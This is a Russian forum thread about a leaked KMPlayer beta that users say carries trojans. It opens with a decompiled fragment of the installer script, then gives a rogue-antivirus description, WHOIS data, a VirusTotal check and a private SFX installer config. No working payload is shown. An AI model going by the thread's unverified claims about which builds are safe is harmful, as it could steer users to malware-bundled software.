SetFlag 13 0
Push *$4(i.r4,i,&t260.r5, &t132.r6, i.r7, l.r8)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\Math.dll
SetFlag 13 0
Push hex={'0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F'};
RegisterDLL $PLUGINSDIR\Math.dll Script 0
Call 709
File $PLUGINSDIR\Math.dll
SetFlag 13 0
Push s=''; a=r8; b=r7; #{b-->0,s=s+hex[a/16%16]+hex[a%16]+#[b>0,'','']; a=a/256;}; r9=s;
RegisterDLL $PLUGINSDIR\Math.dll Script 0
Goto 630
StrCpy $R0 "$9"
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $3
RegisterDLL $PLUGINSDIR\System.dll Free 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push 0
RegisterDLL $PLUGINSDIR\System.dll Free 0
Call 709
File $PLUGINSDIR\Math.dll
SetFlag 13 0
Push
RegisterDLL $PLUGINSDIR\Math.dll Script 0
Return
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
Invalid
SetFlag 13 4622
StrCmp "$PLUGINSDIR" "" 0 719 0
Push $0
SetFlag 2 0
GetTempFileName $TEMP
Delete 8 $0
SetOutPath $0
IfFlag 720 0 2 0
StrCpy $PLUGINSDIR "$0"
Pop $0
Return
MessageBox 2097168 7186 0 0 0
Quit
Return
[/more]
Посему, можете выбрать, что вам парни больше по душе - ждать официальной версии, либо получить все серию троянов. Например первый из них:

VaccineClean

Цитата:

VaccineClean description

VaccineClean is a malicious program presented as a malware remover. It imitates functions of a security tool in order to gain a purchase. Do not mistake Vaccine Clean for a real deal and remove it as soon as possible!

VaccineClean is able to fabricate various notification usually loaded by anti-virus or anti-spyware tools. Those include system scan reports, infection warnings and low security alerts. None of the warnings should be trusted since VaccineClean is not able to actually locate or delete a thing. It may interrupt work of regular security apps. Vaccine Clean may also redirect web browser to deceptive websites.

перевод:

Цитата:

VaccineClean - описание

VaccineClean является вредоносной программой маскирующейся под антивирус. Он имитирует антивирус для стимуляции своей покупки. Не путайте его с реальным антивирусом, и удалите как можно скорее!

VaccineClean умеет имитировать различные уведомления которые обычно выводятся антивирусами или программами защиты от шпионов. Они включают проверку системы отчетов, предупреждений о заражении и оповещения о низкой безопасности. Ни одному из его предупреждений доверять не следует так как VaccineClean на самом деле не в состоянии найти или удалить вредоносный код. Зато он может прерывать работу настоящих средств безопасности. VaccineClean также может перенаправить веб-браузер на поддельный веб-сайт.

Второй троян немного иной - он ищет что у Вас плохо лежит и отсылает это своим хозяевам, плюс к тому ставит Вашу машину в ботнет.

Таких аргументов и доказательств в виде кода самих программ достаточно? Я просто декомпилировал установочные скрипты, выводы делаем сами.

XXXLer

Цитата:

я не пойму этих выкриков про фэйк - BASS 2.4+ загружается, EVR не фризится - чем не багфикс?

согласен
evr custom не фризится теперь но все равно кривоватый остался, видно на mpeg2 файлах с dxva под radeon hd - зеленые полосы, не важно это, главное теперь на месте обычный не кривой evr и на него оверлеем в кадр заведены сабы (как в pot), так что есть и dxva и сабы, встроенный mkv сплиттер еще подпилили нормально, bass опять же, наконец-то после древней 1435pre2 уже можно что-то делать на такой основе, а кто там пофиксил, отдельный китаец или сами разрабы, официальная она или фейк - пофигу, тут виден результат а не та хрень которую нам предлагали все это время в виде новых версий

Цитата:

в плеере туча глюков и недоработок

это да, ассоциации из плеера так и не осилил(и) под win7

7sh3

Я сейчас глянул по WhoIs сайт (IP 118.159.250.15 ), откуда вся зараза качается:


Цитата:

Registration
Registrar History:
1 registrar
NS History:
9 changes on 6 unique name servers over 8 years.
IP History:
7 changes on 6 unique name servers over 6 years.
Whois History:
529 records have been archived since 2005-01-20 .
Dedicated Hosting:
kmplayer.com is hosted on a dedicated server.
Log In or Create a FREE account to start monitoring this domain name

DomainTools for Windows®

Now you can access domain ownership records anytime, anywhere... right from your own desktop! Download Now>
Domain Name : kmplayer.com

Registrant Contact:
PandoraTV Corp.
135-921 Seoul gangnam Bldg Yeoksam-dong Gangnam-gu SEOUL

Administrative Contact; Technical Contact:
PandoraTV Corp.(KMPlayer)

135-921 Seoul gangnam Bldg Yeoksam-dong Gangnam-gu SEOUL
Tel : 02-6393-4300 Fax : 02-558-5920

Record Creadted on : 2003-08-28
Record Expires on : 2011-08-28
Record last updated on : 2011-01-28

Domain servers in listed order:
n1.pandora.tv
n2.pandora.tv
n15.pandora.tv
n16.pandora.tv

Website Title:

The KMPlayer - Powered by Pandora TV
Title Relevancy
77%
Meta Description:
Directshow based all in one player written by delphi from scratch
Description Relevancy:
9% relevant.
Meta Keywords:
kmp, dvd, audio, video, kmplayer
Keyword Relevancy:
40% relevant
Compete Rank:
#74,303 with 25,507 Unique visitors per month
Quantcast Rank:
#190,769
DMOZ:
1 listings

DMOZ Category:
/ World / Korean /
Wikipedia:
22 pages
AboutUs:
Wiki article on Kmplayer.com
SEO Score:
72%
Terms:
347 (Unique: 231, Linked: 138)
Images:
33 (Alt tags missing: 19)
Links:
84 (Internal: 56, Outbound: 1)
Similar Domains:
kmpl.com, kmplus.com, kmplaza.com, kmplant.com, kmplay.com, kmplyer.com, kmphotographyweddings.com, kmplegal.com, kmplaer.com, kmphwebsolutions.com, kmpoker.com, kmpilates.com, kmpmm.com
Search Engine Preview (View details)

ICANN Registrar:

TODAY AND TOMORROW CO. LTD.
Created:
2003-08-27
Expires:
2011-08-27
Updated:
2011-01-27
Registrar Status:
ok
Name Server:
N1.PANDORA.TV (has 3 domains)
N15.PANDORA.TV (has 3 domains)
N16.PANDORA.TV (has 3 domains)
N2.PANDORA.TV (has 3 domains)
Whois Server:
whois.ttpia.com
General TLDs:
KmPlayer.comkmplayer.com whois (registered and active website)
KmPlayer.netkmplayer.net whois (registered and active website)
KmPlayer.orgkmplayer.org whois (registered and active website)
KmPlayer.bizkmplayer.biz whois (registered and active website)
KmPlayer.infokmplayer.info whois (registered and active website)
KmPlayer.usbuy kmplayer.us (never registered before)

сидит себе в Японии, кто его обслуживает не известно, так что просто подменить файлы находясь вдали от автора злоумышленник вполне мог бы.

Victor_VG
Ну значит чтобы эти трояны не качать - открываем инсталлер в 7-zip'е и смотрим даты изменений файлов:

Тобишь основной exe-шник действительно откомпилирован 7-го апреля сего года.
Далее проверяем файл на Virustotal для надёжности:
http://www.virustotal.com/file-scan/report.html?id=1a416bf70aa7d9a2e8731554fd46ea502c1332442346a221d5aa206153ac167b-1302214643
Файл чист.

Engaged Clown

Да, в этом случае самое простое - распаковать установку и потом вручную запустить мастера. У этой пакости я насчитал девять вариантов отличающихся "датой сборки" KMPlayer.exe, а вот бинарная начинка там у всех совпала. Я имею ввиду секцию .техт где исполняемый код сидит. Дальше смотреть не стал. И так три часа убил на возню с этой пакостью.

7sh3

Цитата:

уже можно что-то делать на такой основе

Уж лучше дождаться оффициального дистрибутива 1440, чем ставить неизвестно что, и тем более делать сборки на этой основе.

сборки надо делать по другому немного, чтоб гемора было поменьше с апгрейдом и конфликтами, в том случае если 7sh3 захочет параллельно и KMP и Pot "выпускать" c наворотами. Например набор кодеков ставить не в подпаку плеера, а в какую нибудь одну, "рядом" с плеерами, чтобы в случае апгрейда одного из плееров не "ломались" настройки на внешние кодеки у другого. И второе - вариант сохранения/подхвата пользовательских настроек плеера. Например всё что не касается непосредственно кодеков, пользователь настраивает в отдельном custom-профиле из которого эти настроки копировались бы во все остальные, а потом поверх них записывались бы именно "фирменные" для каждого профиля настройки...

хочу сказать, что обновление кодеков не всегда идет на пользу. Вот вчера обновлял ffdshow и видео начало артефачить, пришлось на более старую версию откатиться

freeman440

Именно потому, я до сих пор вожусь с их подбором.

У меня две новости - плохая и хорошая, начну с плохой:

Разработчикам о трояне сказал - уже меня по его поводу спрашивали с намёком на применение пресловутой ст. 273 УК по данному поводу - как видно, кто-то просто устно пожаловался, а формальных бумаг видать покуда не было - иначе бы разговаривали по другому, а не просто вытащили поговорить в на прогулку в парк. Пришлось пообещать принять возможные меры по пресечению "эпидемии".

И вот хорошая:

Цитата:

isroot

Опубликовано 7 часов назад

Исправлена ошибка с автоматическим изменением скины
Дублирование не работает обновление было установлено, исправить ошибку.
Программа в настоящее время используется, когда ошибка происходит при установке программы
Пожалуйста, еще раз скачать и установить его с помощью.

Извините за причиненные неудобства.

Перевод делал в Гугле - корейского я не знаю, а это пост на форуме Пандоры. Пока могу предложить как вариант подождать реакции на моё сообщение в админке оффорума - такая вещь как трояны незамеченной не пройдёт, и кто-то на неё внимание да обратит. Если что, то у меня этот дистрибутив сохранился для его передачи isroot на анализ.

Ну а для желающих, неофициальный совет - сделайте себе простую RAR SFX установку, типа такой как у меня для таких вещей служит:

Цитата:

Path=KMPlayer
Setup=KMPSetup.exe
Title=Установка KMPlayer 3.0.0.1440 private beta
Text
{
Версия не для распространения! Специальная не публичная сборка для тестирования модераторами!
Что нового?

1. FLV - SKIP Problem (http://www.kmplayer.com/forums/showthread.php?t=17708)
2. mkv + 24 bits FLAC audio problem. (http://www.kmplayer.com/forums/showthread.php?t=17491)
3. Fixed screen size problem (m2ts file).
4. Fixed some video’s audio sync problem
5. Fixed EVR Mode freezing problem (Vista & Windows7)
6. Update BASE ver 2.4.6.0 Audio Codec (support OFR file)
7. Fixed EAC3 Codec & Filter Problem
8. Fixed TRUEHD Codec Problem
9. Fixed MP3 ID3V2 Info Problem(http://www.kmplayer.com/forums/showthread.php?t=17237 )
10. Add new function Album art - Thumnail Image extraction from WMA File
11. Fixed EVR C/A
12. Fixed mp4 file analysis problem
13. Improve file facing speed.
}
Shortcut=D, KMPlayer.exe, , "KMPlayer, moderators test build 3.0.0.1440", KMPlayer.lnk, KMPlayer.exe
Shortcut=P, KMPlayer.exe, Accessories\Entertainment, "KMPlayer, moderators test build 3.0.0.1440", KMplayer.lnk, KMPlayer.exe

этот делался для себя лично, на скорую руку. Выйдет официальная версия - вот тогда вытащу на свет Божий SDK и сделаю полноценную сборку с применением NSIS. Раньше я о не и думать не хочу.

Engaged Clown

К тому что ты положил на ргхост я добавил комментарий-предупреждение со способом обойти устоновку "подарка" и ссылкой на его анализ. Потому прошу пока его не удаляй - я эту ссылку дал в админке форума для анализа коллегами и жду что посоветует isroot как ведущий разработчик. Он может отписаться как там, так и в личу, либо kent может прийти сюда - из всей команды разработчиков он единственный сносно владеет русским языком и ему не придётся использовать перевод. В принципе я был бы рад его приходу сюда - у нас у всех появился бы ещё один прямой канал связи с разработчиками и все вместе мы могли бы более быстро отлавливать и устранять ошибки в плеере.

Victor_VG

Цитата:

И вот хорошая:

уважаемый, а что там? скачивается версия 39.

Victor_VG
в общем все ясно, то что скачал и выложил Engaged Clown и есть та версия которая там у вас типа тестируется (по самим файлам)

7sh3
ALEX90

Да, и пока я жду от isroot или kent ответ с советом как мне поступить в данной ситуации - попадать под "молотки" никому нет нужды, а кто именно, зачем и как запустил внутреннюю альфу в сеть - разбираемся. Название в шапке той темы это своеобразная заявка о намерениях - сказать людям что им предстоит протестировать, но пока публичного тестирования мы ещё не начинали, и потому там скачивается последняя финальная версия 3.0.0.1439. Как только убедимся что ошибки устранены, тут же выложим и публичную бету. Никто с этим тянуть не станет.

Столько страстей) Остается понять простому юзеру, что качать и чем пользоваться?)
7sh3 сборка от 8 марта у вас последняя? ну вот на ней и остаемся) Просто все рулит круто ) Все фильмы идут на ура ) Еще раз благодарю автора сборок)
и все же 7sh3 попробовал Daum твою же сборку и вернулся на KMP))))

A вообще ты я уверен можешь сделать просто 7sh3Player и пошли все корейцы с китайцами в сад)

KIKMIK

"Страстей" не было и нет. Есть рабочие моменты. И пока нет публичной беты 1440 я бы рекомендовал оставаться на стабильной версии 1439 - пусть её возможности и "хуже", но зато ряда проблем там не будет. Многим так будет спокойнее. А мы без нервотрёпки новую версию доработаем и предоставим на общий суд. Предлагаю такой вариант действий. Кто "За"?

Цитата:

Кто "За"?

Я. Лучше немного подождать, куда спешить-то?

Victor_VG

Цитата:

без нервотрёпки новую версию доработаем

простой пример как это делает автор pot, текущие бета версии в свободном доступе на его форуме, там ему пользователи говорят о какой-нибудь проблеме - он исправляет за пару дней и выкладывает новую бету, и так выпускается много бет пока автор не решает что текущая бета является боле менее стабильной и выкладывает ее для скачки на главном офф ресурсе, через пару тройку месяцев все повторяется
это я все к чему - чего вы там тестируете, выложили бы и все, нет, надо нагнать ажиотажу, сделать утечку с троянами, можно подумать что когда выйдет официально это будет прям образец стабильности чего резину то тянуть, чем больше народу тестирует тем быстрее находятся баги, и не будет всех этих непоняток

Victor_VG, походу сам большой троян, аж до УК добрался... Чудной все же

7sh3

Это было бы совсем не плохо, но не забывай, что на рабочих серверах имеется полный архив исходных кодов плеера вплоть до исходников версии 1440 которые при желании можно и собрать, особенно коли есть доступ к серверам или резервным копиям с них, что сами сервера находятся в другой стране, вне контроля автора, и что совсем недавно с ними имелись серьёзные проблемы и часть данных возможно была утрачена.

niels

Я не знаю кто именно автор данной утечки, по крайней мере столь "ценными разведдаными" не располагаю, скоропалительных выводов делать не желаю. Троян найден? Разработчик о нём извещён? Всё, ждём его ответа, а соревноваться в откровенной глупости и детсадовском "остроумии" нечего.

Подскажите как закрепить поверх всех окон? Использую последнюю сборку от 7sh3.

winter1971
настройки > общие > экран > всегда на переднем плане

Скажите, какие ветки реестра надо забекапить, чтобы все настройки сохранить (достаточно ли [HKEY_CURRENT_USER\Software\KMPlayer], или это наоборот слишком много)? Сейчас установлена сборка от 7sh3, хотелось бы при последующих её установках просто запускать reg-файлик и восстанавливать все дополнительно сделанные настройки.